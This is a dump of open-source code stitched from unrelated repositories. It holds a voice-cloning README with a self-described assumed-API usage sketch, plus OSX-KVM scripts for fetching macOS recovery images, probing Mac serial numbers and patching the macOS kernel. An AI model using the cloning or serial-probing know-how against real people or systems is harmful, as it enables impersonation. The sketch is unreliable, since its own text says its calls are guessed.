- u) * e # Compute the fine output out_fine = self.O4(F.relu(self.O3(hidden_fine))) posterior = F.softmax(out_fine, dim=1) distrib = torch.distributions.Categorical(posterior) out_fine = distrib.sample() f_outputs.append(out_fine) # Put the hidden state back together hidden = torch.cat([hidden_coarse, hidden_fine], dim=1) # Display progress speed = (i + 1) / (time.time() - start) stream('Gen: %i/%i -- Speed: %i', (i + 1, seq_len, speed)) coarse = torch.stack(c_outputs).squeeze(1).cpu().data.numpy() fine = torch.stack(f_outputs).squeeze(1).cpu().data.numpy() output = combine_signal(coarse, fine) return output, coarse, fine def init_hidden(self, batch_size=1) : return torch.zeros(batch_size, self.hidden_size).cuda() def num_params(self) : parameters = filter(lambda p: p.requires_grad, self.parameters()) parameters = sum([np.prod(p.size()) for p in parameters]) / 1_000_000 print('Trainable Parameters: %.3f million' % parameters)
# Real-Time Voice Cloning

This repository is an implementation of [Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis](https://arxiv.org/pdf/1806.04558.pdf) (SV2TTS) with a vocoder that works in real-time. This was my [master's thesis](https://matheo.uliege.be/handle/2268.2/6801).

SV2TTS is a deep learning framework in three stages. In the first stage, one creates a digital representation of a voice from a few seconds of audio. In the second and third stages, this representation is used as a reference to generate speech given arbitrary text.

**Video demonstration** (click the picture):

[![Toolbox demo](https://i.imgur.com/8lFUlgz.png)](https://www.youtube.com/watch?v=-O_hYhToKoA)

### Papers implemented

| URL | Designation | Title | Implementation source |
| --- | ----------- | ----- | --------------------- |
|[**1806.04558**](https://arxiv.org/pdf/1806.04558.pdf) | **SV2TTS** | **Transfer Learning from Speaker Verification to Multispeaker Text-To-Speech Synthesis** | This repo |
|[1802.08435](https://arxiv.org/pdf/1802.08435.pdf) | WaveRNN (vocoder) | Efficient Neural Audio Synthesis | [fatchord/WaveRNN](https://github.com/fatchord/WaveRNN) |
|[1703.10135](https://arxiv.org/pdf/1703.10135.pdf) | Tacotron (synthesizer) | Tacotron: Towards End-to-End Speech Synthesis | [fatchord/WaveRNN](https://github.com/fatchord/WaveRNN) |
|[1710.10467](https://arxiv.org/pdf/1710.10467.pdf) | GE2E (encoder) | Generalized End-To-End Loss for Speaker Verification | This repo |

## Heads up

Like everything else in Deep Learning, this repo has quickly gotten old. Many SaaS apps (often paid) will give you better audio quality than this repository will. If you wish for an open-source solution with high voice quality:

- Check out [paperswithcode](https://paperswithcode.com/task/speech-synthesis/) for other repositories and recent research in the field of speech synthesis.
- Check out [CoquiTTS](https://github.com/coqui-ai/tts) for a repository with better voice cloning quality and more functionality.
- Check out [MetaVoice-1B](https://github.com/metavoiceio/metavoice-src) for a large voice model with high voice quality.

## Setup

### 1. Install Requirements

1. Both Windows and Linux are supported. A GPU is recommended for training and for inference speed, but is not mandatory.
2. Python 3.7 is recommended. Python 3.5 or greater should work, but you'll probably have to tweak the dependencies' versions. I recommend setting up a virtual environment using `venv`, but this is optional.
3. Install [ffmpeg](https://ffmpeg.org/download.html#get-packages). This is necessary for reading audio files.
4. Install [PyTorch](https://pytorch.org/get-started/locally/). Pick the latest stable version, your operating system, and your package manager (pip by default), then pick any of the proposed CUDA versions if you have a GPU, otherwise pick CPU. Run the given command.
5. Install the remaining requirements with `pip install -r requirements.txt`.

### 2. (Optional) Download Pretrained Models

Pretrained models are now downloaded automatically. If this doesn't work for you, you can manually download them [here](https://github.com/CorentinJ/Real-Time-Voice-Cloning/wiki/Pretrained-models).

### 3. (Optional) Test Configuration

Before you download any dataset, you can begin by testing your configuration with:

`python demo_cli.py`

If all tests pass, you're good to go.

### 4. (Optional) Download Datasets

For playing with the toolbox alone, I only recommend downloading [`LibriSpeech/train-clean-100`](https://www.openslr.org/resources/12/train-clean-100.tar.gz). Extract the contents as `<datasets_root>/LibriSpeech/train-clean-100` where `<datasets_root>` is a directory of your choosing. Other datasets are supported in the toolbox, see [here](https://github.com/CorentinJ/Real-Time-Voice-Cloning/wiki/Training#datasets). You're free not to download any dataset, but then you will need your own data as audio files or you will have to record it with the toolbox.

### 5. Launch the Toolbox

You can then try the toolbox:

`python demo_toolbox.py -d <datasets_root>`

or

`python demo_toolbox.py`

depending on whether you downloaded any datasets. If you are running an X-server or if you have the error `Aborted (core dumped)`, see [this issue](https://github.com/CorentinJ/Real-Time-Voice-Cloning/issues/11#issuecomment-504733590).
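### Programmatic usage (sketch)

The toolbox code above strings the three stages together through the speaker encoder, the `Synthesizer` class, and `vocoder/inference.py`. As a rough, non-authoritative illustration of how those calls fit together outside the GUI, here is a minimal sketch. The `encoder.inference` and `synthesizer.inference` module paths, the `synthesize_spectrograms` call, and the model file paths are assumptions inferred from how the toolbox uses these objects (see `demo_cli.py` for the canonical entry point); the remaining calls mirror the code shown in this repository.

```python
from pathlib import Path

import numpy as np
import soundfile as sf

from encoder import inference as encoder          # assumed module path
from synthesizer.inference import Synthesizer     # assumed module path
from vocoder import inference as vocoder          # matches vocoder/inference.py

# Load the three pretrained models (placeholder paths).
encoder.load_model(Path("saved_models/encoder.pt"))
synthesizer = Synthesizer(Path("saved_models/synthesizer.pt"))
vocoder.load_model(Path("saved_models/vocoder.pt"))

# 1) Embed a few seconds of reference speech, as the toolbox does.
#    preprocess_wav is assumed to also accept a file path (the toolbox passes
#    raw arrays).
ref_wav = encoder.preprocess_wav(Path("reference.wav"))
embed, partial_embeds, _ = encoder.embed_utterance(ref_wav, return_partials=True)

# 2) Synthesize a mel spectrogram conditioned on the embedding (assumed API).
texts = ["This is a cloned voice speaking."]
spec = synthesizer.synthesize_spectrograms(texts, [embed])[0]

# 3) Vocode the spectrogram with the batched WaveRNN and normalize, as the
#    toolbox does before playback.
wav = vocoder.infer_waveform(spec)
wav = wav / np.abs(wav).max() * 0.97

sf.write("cloned.wav", wav.astype(np.float32), Synthesizer.sample_rate)
```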
OSX-KVM
182e2dd0715175801521f6342ac7cc715044cb12
File: fetch-macOS-v2.py #!/usr/bin/env python3 # pylint: disable=C0301,C0116,C0103,R0903 """ Gather recovery information for Macs. Copyright (c) 2019, vit9696 macrecovery is a tool that helps to automate recovery interaction. It can be used to download diagnostics and recovery as well as analyse MLB. Requires python to run. Run with `-h` argument to see all available arguments. Upstream: https://github.com/acidanthera/OpenCorePkg/tree/master/Utilities/macrecovery pylint -> Your code has been rated at -0.08/10 ;( """ import argparse import binascii import hashlib import json import linecache import os import random import struct import sys try: from urllib.request import Request, HTTPError, urlopen from urllib.parse import urlparse except ImportError: from urllib2 import Request, HTTPError, urlopen from urlparse import urlparse SELF_DIR = os.path.dirname(os.path.realpath(__file__)) RECENT_MAC = 'Mac-7BA5B2D9E42DDD94' MLB_ZERO = '00000000000000000' MLB_VALID = 'C02749200YGJ803AX' MLB_PRODUCT = '00000000000J80300' TYPE_SID = 16 TYPE_K = 64 TYPE_FG = 64 INFO_PRODUCT = 'AP' INFO_IMAGE_LINK = 'AU' INFO_IMAGE_HASH = 'AH' INFO_IMAGE_SESS = 'AT' INFO_SIGN_LINK = 'CU' INFO_SIGN_HASH = 'CH' INFO_SIGN_SESS = 'CT' INFO_REQURED = [INFO_PRODUCT, INFO_IMAGE_LINK, INFO_IMAGE_HASH, INFO_IMAGE_SESS, INFO_SIGN_LINK, INFO_SIGN_HASH, INFO_SIGN_SESS] def run_query(url, headers, post=None, raw=False): if post is not None: data = '\n'.join([entry + '=' + post[entry] for entry in post]) if sys.version_info[0] >= 3: data = data.encode('utf-8') else: data = None req = Request(url=url, headers=headers, data=data) try: response = urlopen(req) if raw: return response return dict(response.info()), response.read() except HTTPError as e: print(f'ERROR: "{e}" when connecting to {url}') sys.exit(1) def generate_id(id_type, id_value=None): valid_chars = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'] return ''.join(random.choice(valid_chars) for i in range(id_type)) if not id_value else id_value def product_mlb(mlb): return '00000000000' + mlb[11] + mlb[12] + mlb[13] + mlb[14] + '00' def mlb_from_eeee(eeee): if len(eeee) != 4: print('ERROR: Invalid EEEE code length!') sys.exit(1) return f'00000000000{eeee}00' def int_from_unsigned_bytes(byte_list, byteorder): if byteorder == 'little': byte_list = byte_list[::-1] encoded = binascii.hexlify(byte_list) return int(encoded, 16) # zhangyoufu https://gist.github.com/MCJack123/943eaca762730ca4b7ae460b731b68e7#gistcomment-3061078 2021-10-08 Apple_EFI_ROM_public_key_1 = 0xC3E748CAD9CD384329E10E25A91E43E1A762FF529ADE578C935BDDF9B13F2179D4855E6FC89E9E29CA12517D17DFA1EDCE0BEBF0EA7B461FFE61D94E2BDF72C196F89ACD3536B644064014DAE25A15DB6BB0852ECBD120916318D1CCDEA3C84C92ED743FC176D0BACA920D3FCF3158AFF731F88CE0623182A8ED67E650515F75745909F07D415F55FC15A35654D118C55A462D37A3ACDA08612F3F3F6571761EFCCBCC299AEE99B3A4FD6212CCFFF5EF37A2C334E871191F7E1C31960E010A54E86FA3F62E6D6905E1CD57732410A3EB0C6B4DEFDABE9F59BF1618758C751CD56CEF851D1C0EAA1C558E37AC108DA9089863D20E2E7E4BF475EC66FE6B3EFDCF ChunkListHeader = struct.Struct('<4sIBBBxQQQ') assert ChunkListHeader.size == 0x24 Chunk = struct.Struct('<I32s') assert Chunk.size == 0x24 def verify_chunklist(cnkpath): with open(cnkpath, 'rb') as f: hash_ctx = hashlib.sha256() data = f.read(ChunkListHeader.size) hash_ctx.update(data) magic, header_size, file_version, chunk_method, signature_method, chunk_count, chunk_offset, signature_offset = ChunkListHeader.unpack(data) assert magic == b'CNKL' assert header_size == 
ChunkListHeader.size assert file_version == 1 assert chunk_method == 1 assert signature_method in [1, 2] assert chunk_count > 0 assert chunk_offset == 0x24 assert signature_offset == chunk_offset + Chunk.size * chunk_count for _ in range(chunk_count): data = f.read(Chunk.size) hash_ctx.update(data) chunk_size, chunk_sha256 = Chunk.unpack(data) yield chunk_size, chunk_sha256 digest = hash_ctx.digest() if signature_method == 1: data = f.read(256) assert len(data) == 256 signature = int_from_unsigned_bytes(data, 'little') plaintext = 0x1ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003031300d0609608648016503040201050004200000000000000000000000000000000000000000000000000000000000000000 | int_from_unsigned_bytes(digest, 'big') assert pow(signature, 0x10001, Apple_EFI_ROM_public_key_1) == plaintext elif signature_method == 2: data = f.read(32) assert data == digest raise RuntimeError('Chunklist missing digital signature') else: raise NotImplementedError assert f.read(1) == b'' def get_session(args): headers = { 'Host': 'osrecovery.apple.com', 'Connection': 'close', 'User-Agent': 'InternetRecovery/1.0', } headers, _ = run_query('http://osrecovery.apple.com/', headers) if args.verbose: print('Session headers:') for header in headers: print(f'{header}: {headers[header]}') for header in headers: if header.lower() == 'set-cookie': cookies = headers[header].split('; ') for cookie in cookies: return cookie if cookie.startswith('session=') else ... 
raise RuntimeError('No session in headers ' + str(headers)) def get_image_info(session, bid, mlb=MLB_ZERO, diag=False, os_type='default', cid=None): headers = { 'Host': 'osrecovery.apple.com', 'Connection': 'close', 'User-Agent': 'InternetRecovery/1.0', 'Cookie': session, 'Content-Type': 'text/plain', } post = { 'cid': generate_id(TYPE_SID, cid), 'sn': mlb, 'bid': bid, 'k': generate_id(TYPE_K), 'fg': generate_id(TYPE_FG) } if diag: url = 'http://osrecovery.apple.com/InstallationPayload/Diagnostics' else: url = 'http://osrecovery.apple.com/InstallationPayload/RecoveryImage' post['os'] = os_type headers, output = run_query(url, headers, post) output = output.decode('utf-8') info = {} for line in output.split('\n'): try: key, value = line.split(': ') info[key] = value except Exception: continue for k in INFO_REQURED: if k not in info: raise RuntimeError(f'Missing key {k}') return info def save_image(url, sess, filename='', directory=''): purl = urlparse(url) headers = { 'Host': purl.hostname, 'Connection': 'close', 'User-Agent': 'InternetRecovery/1.0', 'Cookie': '='.join(['AssetToken', sess]) } if not os.path.exists(directory): os.mkdir(directory) if filename == '': filename = os.path.basename(purl.path) if filename.find('/') >= 0 or filename == '': raise RuntimeError('Invalid save path ' + filename) print(f'Saving {url} to {directory}/{filename}...') with open(os.path.join(directory, filename), 'wb') as fh: response = run_query(url, headers, raw=True) total_size = int(response.headers['content-length']) / float(2 ** 20) # print(total_size) if total_size < 1: total_size = response.headers['content-length'] print("Note: The total download size is %s bytes" % total_size) else: print("Note: The total download size is %0.2f MB" % total_size) size = 0 while True: chunk = response.read(2**20) if not chunk: break fh.write(chunk) size += len(chunk) print(f'\r{size / (2**20)} MBs downloaded...', end='') sys.stdout.flush() print('\rDownload complete!\t\t\t\t\t') return os.path.join(directory, os.path.basename(filename)) def verify_image(dmgpath, cnkpath): print('Verifying image with chunklist...') with open(dmgpath, 'rb') as dmgf: cnkcount = 0 for cnksize, cnkhash in verify_chunklist(cnkpath): cnkcount += 1 print(f'\rChunk {cnkcount} ({cnksize} bytes)', end='') sys.stdout.flush() cnk = dmgf.read(cnksize) if len(cnk) != cnksize: raise RuntimeError(f'Invalid chunk {cnkcount} size: expected {cnksize}, read {len(cnk)}') if hashlib.sha256(cnk).digest() != cnkhash: raise RuntimeError(f'Invalid chunk {cnkcount}: hash mismatch') if dmgf.read(1) != b'': raise RuntimeError('Invalid image: larger than chunklist') print('\rImage verification complete!\t\t\t\t\t') def action_download(args): """ Reference information for queries: Recovery latest: cid=3076CE439155BA14 sn=... bid=Mac-E43C1C25D4880AD6 k=4BE523BB136EB12B1758C70DB43BDD485EBCB6A457854245F9E9FF0587FB790C os=latest fg=B2E6AA07DB9088BE5BDB38DB2EA824FDDFB6C3AC5272203B32D89F9D8E3528DC Recovery default: cid=4A35CB95FF396EE7 sn=... bid=Mac-E43C1C25D4880AD6 k=0A385E6FFC3DDD990A8A1F4EC8B98C92CA5E19C9FF1DD26508C54936D8523121 os=default fg=B2E6AA07DB9088BE5BDB38DB2EA824FDDFB6C3AC5272203B32D89F9D8E3528DC Diagnostics: cid=050C59B51497CEC8 sn=... 
bid=Mac-E43C1C25D4880AD6 k=37D42A8282FE04A12A7D946304F403E56A2155B9622B385F3EB959A2FBAB8C93 fg=B2E6AA07DB9088BE5BDB38DB2EA824FDDFB6C3AC5272203B32D89F9D8E3528DC """ session = get_session(args) info = get_image_info(session, bid=args.board_id, mlb=args.mlb, diag=args.diagnostics, os_type=args.os_type) if args.verbose: print(info) print(f'Downloading {info[INFO_PRODUCT]}...') dmgname = '' if args.basename == '' else args.basename + '.dmg' dmgpath = save_image(info[INFO_IMAGE_LINK], info[INFO_IMAGE_SESS], dmgname, args.outdir) cnkname = '' if args.basename == '' else args.basename + '.chunklist' cnkpath = save_image(info[INFO_SIGN_LINK], info[INFO_SIGN_SESS], cnkname, args.outdir) try: verify_image(dmgpath, cnkpath) return 0 except Exception as err: if isinstance(err, AssertionError) and str(err) == '': try: tb = sys.exc_info()[2] while tb.tb_next: tb = tb.tb_next err = linecache.getline(tb.tb_frame.f_code.co_filename, tb.tb_lineno, tb.tb_frame.f_globals).strip() except Exception: err = "Invalid chunklist" print(f'\rImage verification failed. ({err})') return 1 def action_selfcheck(args): """ Sanity check server logic for recovery: if not valid(bid): return error() ppp = get_ppp(sn) if not valid(ppp): return latest_recovery(bid = bid) # Returns newest for bid. if valid(sn): if os == 'default': return default_recovery(sn = sn, ppp = ppp) # Returns oldest for sn. else: return latest_recovery(sn = sn, ppp = ppp) # Returns newest for sn. return default_recovery(ppp = ppp) # Returns oldest. """ session = get_session(args) valid_default = get_image_info(session, bid=RECENT_MAC, mlb=MLB_VALID, diag=False, os_type='default') valid_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_VALID, diag=False, os_type='latest') product_default = get_image_info(session, bid=RECENT_MAC, mlb=MLB_PRODUCT, diag=False, os_type='default') product_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_PRODUCT, diag=False, os_type='latest') generic_default = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='default') generic_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='latest') if args.verbose: print(valid_default) print(valid_latest) print(product_default) print(product_latest) print(generic_default) print(generic_latest) if valid_default[INFO_PRODUCT] == valid_latest[INFO_PRODUCT]: # Valid MLB must give different default and latest if this is not a too new product. print(f'ERROR: Cannot determine any previous product, got {valid_default[INFO_PRODUCT]}') return 1 if product_default[INFO_PRODUCT] != product_latest[INFO_PRODUCT]: # Product-only MLB must give the same value for default and latest. print(f'ERROR: Latest and default do not match for product MLB, got {product_default[INFO_PRODUCT]} and {product_latest[INFO_PRODUCT]}') return 1 if generic_default[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: # Zero MLB always give the same value for default and latest. print(f'ERROR: Generic MLB gives different product, got {generic_default[INFO_PRODUCT]} and {generic_latest[INFO_PRODUCT]}') return 1 if valid_latest[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: # Valid MLB must always equal generic MLB. print(f'ERROR: Cannot determine unified latest product, got {valid_latest[INFO_PRODUCT]} and {generic_latest[INFO_PRODUCT]}') return 1 if product_default[INFO_PRODUCT] != valid_default[INFO_PRODUCT]: # Product-only MLB can give the same value with valid default MLB. # This is not an error for all models, but for our chosen code it is. 
print('ERROR: Valid and product MLB give mismatch, got {product_default[INFO_PRODUCT]} and {valid_default[INFO_PRODUCT]}') return 1 print('SUCCESS: Found no discrepancies with MLB validation algorithm!') return 0 def action_verify(args): """ Try to verify MLB serial number. """ session = get_session(args) generic_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='latest') uvalid_default = get_image_info(session, bid=args.board_id, mlb=args.mlb, diag=False, os_type='default') uvalid_latest = get_image_info(session, bid=args.board_id, mlb=args.mlb, diag=False, os_type='latest') uproduct_default = get_image_info(session, bid=args.board_id, mlb=product_mlb(args.mlb), diag=False, os_type='default') if args.verbose: print(generic_latest) print(uvalid_default) print(uvalid_latest) print(uproduct_default) # Verify our MLB number. if uvalid_default[INFO_PRODUCT] != uvalid_latest[INFO_PRODUCT]: print(f'SUCCESS: {args.mlb} MLB looks valid and supported!' if uvalid_latest[INFO_PRODUCT] == generic_latest[INFO_PRODUCT] else f'SUCCESS: {args.mlb} MLB looks valid, but probably unsupported!') return 0 print('UNKNOWN: Run selfcheck, check your board-id, or try again later!') # Here we have matching default and latest products. This can only be true for very # new models. These models get either latest or special builds. if uvalid_default[INFO_PRODUCT] == generic_latest[INFO_PRODUCT]: print(f'UNKNOWN: {args.mlb} MLB can be valid if very new!') return 0 if uproduct_default[INFO_PRODUCT] != uvalid_default[INFO_PRODUCT]: print(f'UNKNOWN: {args.mlb} MLB looks invalid, other models use product {uproduct_default[INFO_PRODUCT]} instead of {uvalid_default[INFO_PRODUCT]}!') return 0 print(f'UNKNOWN: {args.mlb} MLB can be valid if very new and using special builds!') return 0 def action_guess(args): """ Attempt to guess which model does this MLB belong. """ mlb = args.mlb anon = mlb.startswith('000') with open(args.board_db, 'r', encoding='utf-8') as fh: db = json.load(fh) supported = {} session = get_session(args) generic_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='latest') for model in db: try: if anon: # For anonymous lookup check when given model does not match latest. model_latest = get_image_info(session, bid=model, mlb=MLB_ZERO, diag=False, os_type='latest') if model_latest[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: if db[model] == 'current': print(f'WARN: Skipped {model} due to using latest product {model_latest[INFO_PRODUCT]} instead of {generic_latest[INFO_PRODUCT]}') continue user_default = get_image_info(session, bid=model, mlb=mlb, diag=False, os_type='default') if user_default[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: supported[model] = [db[model], user_default[INFO_PRODUCT], generic_latest[INFO_PRODUCT]] else: # For normal lookup check when given model has mismatching normal and latest. 
user_latest = get_image_info(session, bid=model, mlb=mlb, diag=False, os_type='latest') user_default = get_image_info(session, bid=model, mlb=mlb, diag=False, os_type='default') if user_latest[INFO_PRODUCT] != user_default[INFO_PRODUCT]: supported[model] = [db[model], user_default[INFO_PRODUCT], user_latest[INFO_PRODUCT]] except Exception as e: print(f'WARN: Failed to check {model}, exception: {e}') if len(supported) > 0: print(f'SUCCESS: MLB {mlb} looks supported for:') for model in supported.items(): print(f'- {model}, up to {supported[model][0]}, default: {supported[model][1]}, latest: {supported[model][2]}') return 0 print(f'UNKNOWN: Failed to determine supported models for MLB {mlb}!') return None # https://stackoverflow.com/questions/2280334/shortest-way-of-creating-an-object-with-arbitrary-attributes-in-python class gdata: """ A string to make pylint happy ;) """ def __init__(self, **kwargs): self.__dict__.update(kwargs) def main(): parser = argparse.ArgumentParser(description='Gather recovery information for Macs') parser.add_argument('--action', choices=['download', 'selfcheck', 'verify', 'guess'], default='', help='Action to perform: "download" - performs recovery downloading,' ' "selfcheck" checks whether MLB serial validation is possible, "verify" performs' ' MLB serial verification, "guess" tries to find suitable mac model for MLB.') parser.add_argument('-o', '--outdir', type=str, default='com.apple.recovery.boot', help='customise output directory for downloading, defaults to com.apple.recovery.boot') parser.add_argument('-n', '--basename', type=str, default='', help='customise base name for downloading, defaults to remote name') parser.add_argument('-b', '--board-id', type=str, default=RECENT_MAC, help=f'use specified board identifier for downloading, defaults to {RECENT_MAC}') parser.add_argument('-m', '--mlb', type=str, default=MLB_ZERO, help=f'use specified logic board serial for downloading, defaults to {MLB_ZERO}') parser.add_argument('-e', '--code', type=str, default='', help='generate product logic board serial with specified product EEEE code') parser.add_argument('-os', '--os-type', type=str, default='default', choices=['default', 'latest'], help=f'use specified os type, defaults to default {MLB_ZERO}') parser.add_argument('-diag', '--diagnostics', action='store_true', help='download diagnostics image') parser.add_argument('-s', '--shortname', type=str, default='', help='available options: high-sierra, mojave, catalina, big-sur, monterey, ventura') parser.add_argument('-v', '--verbose', action='store_true', help='print debug information') parser.add_argument('-db', '--board-db', type=str, default=os.path.join(SELF_DIR, 'boards.json'), help='use custom board list for checking, defaults to boards.json') args = parser.parse_args() if args.code != '': args.mlb = mlb_from_eeee(args.code) if len(args.mlb) != 17: print('ERROR: Cannot use MLBs in non 17 character format!') sys.exit(1) if args.action == 'download': return action_download(args) if args.action == 'selfcheck': return action_selfcheck(args) if args.action == 'verify': return action_verify(args) if args.action == 'guess': return action_guess(args) # No action specified, so present a download menu instead # https://github.com/acidanthera/OpenCorePkg/blob/master/Utilities/macrecovery/boards.json products = [ {"name": "High Sierra (10.13)", "b": "Mac-7BA5B2D9E42DDD94", "m": "00000000000J80300", "short": "high-sierra"}, {"name": "Mojave (10.14)", "b": "Mac-7BA5B2DFE22DDD8C", "m": "00000000000KXPG00", "short": 
"mojave"}, {"name": "Catalina (10.15)", "b": "Mac-00BE6ED71E35EB86", "m": "00000000000000000", "short": "catalina"}, {"name": "Big Sur (11.7)", "b": "Mac-2BD1B31983FE1663", "m": "00000000000000000", "short": "big-sur"}, {"name": "Monterey (12.6)", "b": "Mac-B809C3757DA9BB8D", "m": "00000000000000000", "os_type": "latest", "short": "monterey"}, {"name": "Ventura (13) - RECOMMENDED", "b": "Mac-4B682C642B45593E", "m": "00000000000000000", "os_type": "latest", "short": "ventura"}, {"name": "Sonoma (14) ", "b": "Mac-A61BADE1FDAD7B05", "m": "00000000000000000", "short": "sonoma"} ] for index, product in enumerate(products): name = product["name"] print('%s. %12s' % (index + 1, name)) # test locally using args.shortname = 'mojave' if not args.shortname or args.shortname == '': answer = input('\nChoose a product to download (1-%s): ' % len(products)) try: index = int(answer) - 1 if index < 0: raise ValueError except (ValueError, IndexError): pass else: index = 0 for product in products: if args.shortname == product['short']: break else: index = index+1 product = products[index] try: os_type = product["os_type"] except: os_type = "default" args = gdata(mlb = product["m"], board_id = product["b"], diagnostics = False, os_type = os_type, verbose=False, basename="", outdir=".") action_download(args) if __name__ == '__main__': sys.exit(main()) File: resources/kernel_autopatcher.py #!/usr/bin/env python # # NOTE -> https://github.com/kholia/OSX-KVM/blob/master/reversing-notes.md # # https://github.com/radareorg/radare2-r2pipe/blob/master/python/examples/libgraph.py # https://github.com/radareorg/radare2-r2pipe/tree/master/python # # https://www.hex-rays.com/wp-content/uploads/2019/12/xnu_debugger_primer.pdf # https://geosn0w.github.io/Debugging-macOS-Kernel-For-Fun/ # # sudo apt-get install radare2 # Ubuntu 20.04 LTS # pip install r2pipe # # This software is Copyright (c) 2020, Dhiru Kholia. This program is provided # for educational, research, and non-commercial personal use only. # !!! ATTENTION !!! Any commercial usage against the Apple EULA is at your own # risk! # # Note: Commercial usage and redistribution is forbidden (not allowed). # # THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> 'AS IS' AND ANY EXPRESS OR # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO # EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, # OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # $ ./kernel_autopatcher.py kernel # [+] Processing <kernel> file... # [+] Patching done! # # (Re)Tested against the default "kernel" from macOS Catalina 10.15.7 in # October, 2020. 
# # Note: Disable SIP on the macOS VM (We do it via OpenCore's config.plist) # `00000000` - SIP completely enabled # `30000000` - Allow unsigned kexts and writing to protected fs locations # `67000000` - SIP completely disabled # # Note: sudo mount -uw / # # Kernel location (Catalina): /System/Library/Kernels/kernel # # $ md5sum kernel* # 3966d407c344708d599500c60c1194c0 kernel # 8530d3422795652ed320293ecc127770 kernel.patched # # Test command -> sudo /usr/bin/AssetCacheManagerUtil activate import r2pipe import sys import os def patcher(fname): target_symbol = "sym._cpuid_get_feature_names" # analysis code # r2 = r2pipe.open(fname, ["-2"]) # -2 -> disable stderr messages r2 = r2pipe.open(fname, ["-2", "-w"]) # -2 -> disable stderr messages print("[+] Processing <%s> file..." % fname) r2.cmd('aa') # print(r2.cmd("pdf @ sym._cpuid_get_feature_names")) result = r2.cmdj("axtj %s" % target_symbol) if not result: print("[!] Can't find xrefs to <%s>. Aborting!" % target_symbol) sys.exit(2) # print(result) r2.cmd("s `axt sym._cpuid_get_feature_names~[1]`") # jump to the function call site result = r2.cmdj("pdj 1") if not result: print("[!] Can't disassemble instruction at function call site. Aborting!") sys.exit(3) opcode_size = result[0]["size"] assert (opcode_size == 5) # sanity check, call sym._cpuid_get_feature_name -> 5 bytes # patching code # > pa nop r2.cmd("\"wa nop;nop;nop;nop;nop\"") r2.quit() print("[+] Patching done!") if __name__ == "__main__": if len(sys.argv) > 1: path = sys.argv[1] patcher(path) else: print("Usage: %s [path-to-kernel-file]" % (sys.argv[0])) sys.exit(1) File: resources/idadif.py #!/usr/bin/env python # Small IDA .dif patcher - https://stalkr.net/files/ida/idadif.py import re from sys import argv,exit def patch(file, dif, revert=False): code = open(file,'rb').read() dif = open(dif,'r').read() m = re.findall('([0-9a-fA-F]+): ([0-9a-fA-F]+) ([0-9a-fA-F]+)', dif) for offset,orig,new in m: o, orig, new = int(offset,16), orig.decode('hex'), new.decode('hex') if revert: if code[o]==new: code = code[:o]+orig+code[o+1:] else: raise Exception("patched byte at %s is not %02X" % (offset, ord(new))) else: if code[o]==orig: code = code[:o]+new+code[o+1:] else: raise Exception("original byte at %s is not %02X" % (offset, ord(orig))) open(file,'wb').write(code) def main(): if len(argv)<3: print("Usage: %s <binary> <IDA.dif file> [revert]" % (argv[0])) print("Applies given IDA .dif file to patch binary; use revert to revert patch.") exit(0) file, dif, revert = argv[1], argv[2], False if len(argv)>3: revert = True print("Reverting patch %r on file %r" % (dif, file)) else: print("Patching file %r with %r" % (file, dif)) try: patch(file, dif, revert) print("Done") except Exception as e: print("Error: %s" % str(e)) exit(1) if __name__ == "__main__": main() File: backups/fetch-macOS.py #!/usr/bin/env python3 # encoding: utf-8 # # https://github.com/munki/macadmin-scripts/blob/master/installinstallmacos.py # # Copyright 2017 Greg Neagle. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
